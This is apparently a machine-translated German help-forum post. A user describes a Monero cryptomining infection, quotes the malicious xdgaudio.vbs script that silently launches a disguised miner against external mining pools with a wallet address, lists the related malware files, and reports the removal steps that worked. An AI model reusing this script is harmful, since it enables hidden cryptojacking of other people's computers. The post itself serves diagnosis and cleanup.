Mein Computer ist mit dem Mining-Virus infiziert und gibt mir einen Windows-Skript-Hostfehler
Der erste Fehler, den ich erhalten habe, war ein Windows Script Host-Fehler, der als C: \ Windows \ xdgaudio.vbs beschrieben wird
Wenn ich die Datei gefunden habe, war der Inhalt
Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0 Set WShell = Nothing
Nachdem ich dies gesehen und den Mining-Server in Zeile 3 gefunden hatte, erfuhr ich, dass ich ein Virus erlebt habe, und dies ist ein Mining-Virus.
Schritte, die ich unternommen habe, um dieses Problem zu lösen.
- Hat einen tiefen Windows-Defender-Scan durchgeführt (Nichts erhalten)
- Scan mit Anti-Rootkit durchgeführt (Nichts erhalten)
- Kommentierte das gesamte VBS-Skript xdgaudio.vbs, sodass es nicht ausgeführt wird.
- Navigierte zu " wmipvrse.exe" im Verzeichnis " C: \ Windows \ System32 \ wbem" und stellte fest, dass dies der Windows-Dienst ist. Ich habe ihn nicht gelöscht, sondern nach der Übernahme in etwas anderes umbenannt, sodass er nicht erneut gestartet wird.
Nach den obigen Schritten sind die Fehler verschwunden
IDK, wie lange ich mit diesem Virus infiziert wurde und wie es in meinen Computer gelangte.
Meine Frage an die Community ist, mir zu sagen, ob ich vor diesem Virus gerettet bin und welche weiteren Schritte erforderlich sind, um diese und andere Viren vollständig zu entfernen und wie kann ich feststellen, ob es andere Viren gibt?
Wenn Sie andere Details benötigen, können Sie in den Kommentaren nachfragen.
Vielen Dank.
Der zuerst angezeigte Skriptfehler war dies.
AKTUALISIEREN:
Herausgefunden!! Kurze Antwort: Löschen Sie die Datei "servicecrsssr.vbs" aus Ihrem Windows-Verzeichnis und starten Sie dann den Computer neu. (Ich habe den PLUG trotz der Gefahr von Dateiverlust / -beschädigung tatsächlich ZIEHEN, um zu vermeiden, dass das Programm versucht, während des Herunterfahrens alle fehlerhaften Dateien neu zu schreiben.)
Eine Reihe anderer Dateien ist beteiligt, aber nach dem Löschen (oder Umbenennen) der Datei und dem Neustart war alles gut ... kein Beweis für den laufenden Mining-Prozess. Ich habe diesen Virus auf ZWEI meiner Testcomputer aufgefangen. Dies waren die einzigen Computer, an die das infizierte Laufwerk meines Kunden über USB angeschlossen wurde. Es ist immer noch ein Rätsel, wie sich dieses Ding ausbreitet! Die anderen Dateien, die beteiligt zu sein schienen, waren:
\Windows\winprs.bat \Windows\winvpr.vbs \Windows\winvprse.bat \Windows\xdgaudio.vbs \Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf
Die * .pf-Datei schreibt sich mit neuen zufälligen Zeichen an Stelle der "x" neu, wenn Sie sie umbenennen oder löschen und neu starten - ohne einen negativen Effekt, den ich feststellen kann. Auf meinem ersten infizierten Computer habe ich ALLE Dateien oben umbenannt und nach dem Umbenennen neu gestartet. Die letzte Datei, die ich ausprobiert habe, war "servicecrsssr.vbs". Auf der zweiten infizierten Testmaschine habe ich nur die Datei "servicecrsssr.vbs" umbenannt und neu gestartet, dann war alles gut. Bitte lassen Sie mich wissen, wie das für Sie klappt. Vielen Dank!
Besonderer Dank geht an LREmerys Antwort
0 Antworten auf die Frage
Verwandte Probleme
-
12
Warum wird der Ordner / winsxs so groß und kann er verkleinert werden?
-
2
Erhöhte Berechtigungen für Startanwendungen in Windows?
-
14
PDF Viewer unter Windows
-
7
Welche Windows-Dienste kann ich sicher deaktivieren?
-
8
Firefox PDF-Plugin zum Anzeigen von PDF-Dateien im Browser unter Windows
-
4
Welche Software sollte ich verwenden, um meine Festplatte zu verschlüsseln?
-
1
Windows verliert das Bildschirmlayout
-
1
Gibt es eine Möglichkeit, Installationen / Updates zu verhindern, die meine Festplatte mit kryptisch...
-
1
Wie kann ich von Ubuntu aus über das Netzwerk auf Windows Vista-Drucker zugreifen?
-
6
Log Viewer unter Windows